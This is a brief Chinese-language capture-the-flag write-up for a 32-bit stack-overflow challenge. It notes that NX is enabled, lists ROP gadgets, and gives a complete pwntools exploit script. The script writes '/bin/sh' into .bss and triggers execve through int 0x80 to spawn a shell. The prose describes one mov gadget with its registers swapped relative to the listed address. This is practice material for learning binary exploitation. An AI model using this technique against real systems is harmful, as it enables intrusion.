check一下,开了NX
image.png
拖进ida,没有system也没有binsh,只有一个输入与栈溢出漏洞,所以应该是ret2systemcall的题目,用rop,进行int0x80中断,执行系统调用
image.png
先利用mov dword ptr [edx], eax ; ret向bss段写入"/bin/sh"
int 0x80; eax=0xb; ebx=bss; ecx=0; edx=0
0x0806e850 : pop edx ; pop ecx ; pop ebx ; ret
0x080bae06 : pop eax ; ret
0x080493e1 : int 0x80
0x0806e82a : pop edx ; ret
0x0807b301 : mov dword ptr [eax], edx ; ret
image.png
脚本:
#!/usr/bin/env python
from pwn import *
sh = process('./5simplerop')
bss = 0x080EAF80
pop_edx_ret= 0x0806e82a
pop_eax_ret = 0x080bae06
pop_edx_ecx_ebx_ret = 0x0806e850
int_0x80 = 0x080493e1
mov_edx_eax = 0x0807b301
binsh = "/bin/sh\x00"
payload = ''
payload += 'a'*32
payload += p32(pop_eax_ret) + p32(bss)
payload += p32(pop_edx_ret) + binsh[0:4]
payload += p32(mov_edx_eax)
payload += p32(pop_eax_ret) + p32(bss+4)
payload += p32(pop_edx_ret) + binsh[4:8]
payload += p32(mov_edx_eax)
payload += flat(
[pop_edx_ecx_ebx_ret , 0 , 0 , bss , pop_eax_ret , 0xb , int_0x80])
sh.sendline(payload)
sh.interactive()
